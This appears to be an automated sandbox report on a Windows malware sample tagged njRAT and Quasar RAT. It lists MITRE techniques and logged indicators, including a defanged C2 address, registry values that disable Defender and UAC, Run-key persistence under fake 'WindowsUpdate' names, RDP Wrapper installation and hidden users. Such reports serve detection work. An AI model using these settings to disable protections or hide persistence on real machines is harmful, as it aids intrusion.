njrat | hxxps://152[.]89[.]239[.]119

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00090000000234b3-484.dat	family_quasar
behavioral1/memory/4068-514-0x0000000000290000-0x00000000002DE000-memory.dmp	family_quasar

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 11 IoCs

flow	pid	Process
124	4296	powershell.exe
126	2528	powershell.exe
127	2420	powershell.exe
128	4480	powershell.exe
129	2812	powershell.exe
130	1456	powershell.exe
131	3384	powershell.exe
133	4760	powershell.exe
151	5564	powershell.exe
152	5704	powershell.exe
163	4308	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2092	powershell.exe
320	powershell.exe
2092	powershell.exe
3576	powershell.exe
232	powershell.exe
3380	powershell.exe
4296	powershell.exe
2420	powershell.exe
4480	powershell.exe
2812	powershell.exe
1456	powershell.exe
3384	powershell.exe
4760	powershell.exe
5704	powershell.exe
2528	powershell.exe
5564	powershell.exe
392	powershell.exe
1568	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\Windows\System32\Drivers\etc\hosts	cmd.exe

Modifies Windows Firewall 2 TTPs 8 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5612	netsh.exe
3480	netsh.exe
4408	netsh.exe
5856	netsh.exe
4016	netsh.exe
5468	netsh.exe
5812	netsh.exe
1576	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 8 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4764	attrib.exe
4044	attrib.exe
4908	attrib.exe
3704	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	WindowsUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	winlogin.exe

Executes dropped EXE 15 IoCs

pid	Process
1444	winlogin.exe
3360	WindowsUpdate.exe
4068	srlhost.exe
3300	smhost.exe
2592	RDPWInst.exe
1580	ngrok.exe
380	RDPWInst.exe
1004	RDPWInst.exe
5432	RDPWInst.exe
3168	RDPWInst.exe
5752	RDPWInst.exe
2488	RDPWInst.exe
5932	RDPWInst.exe
5976	RDPWInst.exe
2792	dismhost.exe

Loads dropped DLL 25 IoCs

pid	Process
5392	svchost.exe
5348	svchost.exe
5700	svchost.exe
2472	svchost.exe
692	svchost.exe
5988	svchost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe
2792	dismhost.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogo = "C:\\ProgramData\\Windata\\winlogin.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\ProgramData\\Windata\\smhost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe"	reg.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
134	raw.githubusercontent.com
135	raw.githubusercontent.com
157	raw.githubusercontent.com
158	raw.githubusercontent.com
161	raw.githubusercontent.com
163	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
143	ip-api.com

Modifies WinLogon 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0"	reg.exe

Drops file in Program Files directory 33 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\termsrv.dll	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat	powershell.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File created	C:\Program Files\RDP Wrapper\update.zip	powershell.exe
File created	C:\Program Files\RDP Wrapper\autoupdate.zip	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\autoupdate.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	cmd.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt	powershell.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2840	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	srlhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlogin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	smhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
804	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1302416131-1437503476-2806442725-1000\{033C8625-5755-4EF4-856F-418F54CBDF1B}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
2736	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 139392.crdownload:SmartScreen	msedge.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
804	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
828	schtasks.exe
4500	schtasks.exe
832	schtasks.exe
4416	schtasks.exe
2132	schtasks.exe
2352	schtasks.exe
60	schtasks.exe
3328	schtasks.exe
3192	schtasks.exe
5072	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	163	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2208	msedge.exe
2208	msedge.exe
4304	msedge.exe
4304	msedge.exe
1928	identity_helper.exe
1928	identity_helper.exe
4068	msedge.exe
4068	msedge.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
232	powershell.exe
232	powershell.exe
232	powershell.exe
3380	powershell.exe
3380	powershell.exe
3380	powershell.exe
3324	msedge.exe
3324	msedge.exe
320	powershell.exe
320	powershell.exe
320	powershell.exe
4296	powershell.exe
4296	powershell.exe
4296	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2420	powershell.exe
2420	powershell.exe
2420	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
2812	powershell.exe
2812	powershell.exe
2812	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
4824	msedge.exe
4824	msedge.exe
4824	msedge.exe
4824	msedge.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe
5392	svchost.exe
5392	svchost.exe
5392	svchost.exe
5392	svchost.exe
5564	powershell.exe

Suspicious behavior: LoadsDriver 9 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	3576	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	2592	RDPWInst.exe
Token: SeDebugPrivilege	4068	srlhost.exe
Token: SeAuditPrivilege	5392	svchost.exe
Token: SeDebugPrivilege	5564	powershell.exe
Token: SeDebugPrivilege	5704	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	5784	powershell.exe
Token: SeDebugPrivilege	3300	smhost.exe
Token: SeDebugPrivilege	380	RDPWInst.exe
Token: SeAuditPrivilege	5348	svchost.exe
Token: SeDebugPrivilege	1004	RDPWInst.exe
Token: SeAuditPrivilege	2428	svchost.exe
Token: 33	3300	smhost.exe
Token: SeIncBasePriorityPrivilege	3300	smhost.exe
Token: SeDebugPrivilege	5432	RDPWInst.exe
Token: SeAuditPrivilege	5700	svchost.exe
Token: SeDebugPrivilege	3168	RDPWInst.exe
Token: SeAuditPrivilege	2472	svchost.exe
Token: 33	3300	smhost.exe
Token: SeIncBasePriorityPrivilege	3300	smhost.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeIncreaseQuotaPrivilege	392	powershell.exe
Token: SeSecurityPrivilege	392	powershell.exe
Token: SeTakeOwnershipPrivilege	392	powershell.exe
Token: SeLoadDriverPrivilege	392	powershell.exe
Token: SeSystemProfilePrivilege	392	powershell.exe
Token: SeSystemtimePrivilege	392	powershell.exe
Token: SeProfSingleProcessPrivilege	392	powershell.exe
Token: SeIncBasePriorityPrivilege	392	powershell.exe
Token: SeCreatePagefilePrivilege	392	powershell.exe
Token: SeBackupPrivilege	392	powershell.exe
Token: SeRestorePrivilege	392	powershell.exe
Token: SeShutdownPrivilege	392	powershell.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeSystemEnvironmentPrivilege	392	powershell.exe
Token: SeRemoteShutdownPrivilege	392	powershell.exe
Token: SeUndockPrivilege	392	powershell.exe
Token: SeManageVolumePrivilege	392	powershell.exe
Token: 33	392	powershell.exe
Token: 34	392	powershell.exe
Token: 35	392	powershell.exe
Token: 36	392	powershell.exe
Token: SeDebugPrivilege	5752	RDPWInst.exe
Token: SeAuditPrivilege	1072	svchost.exe
Token: 33	3300	smhost.exe
Token: SeIncBasePriorityPrivilege	3300	smhost.exe
Token: SeDebugPrivilege	2488	RDPWInst.exe
Token: SeAuditPrivilege	692	svchost.exe
Token: SeDebugPrivilege	5932	RDPWInst.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4068	srlhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4304 wrote to memory of 4996	4304	msedge.exe	82
PID 4304 wrote to memory of 4996	4304	msedge.exe	82
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 3104	4304	msedge.exe	83
PID 4304 wrote to memory of 2208	4304	msedge.exe	84
PID 4304 wrote to memory of 2208	4304	msedge.exe	84
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85
PID 4304 wrote to memory of 5116	4304	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4908	attrib.exe
3704	attrib.exe
5308	attrib.exe
4764	attrib.exe
4044	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
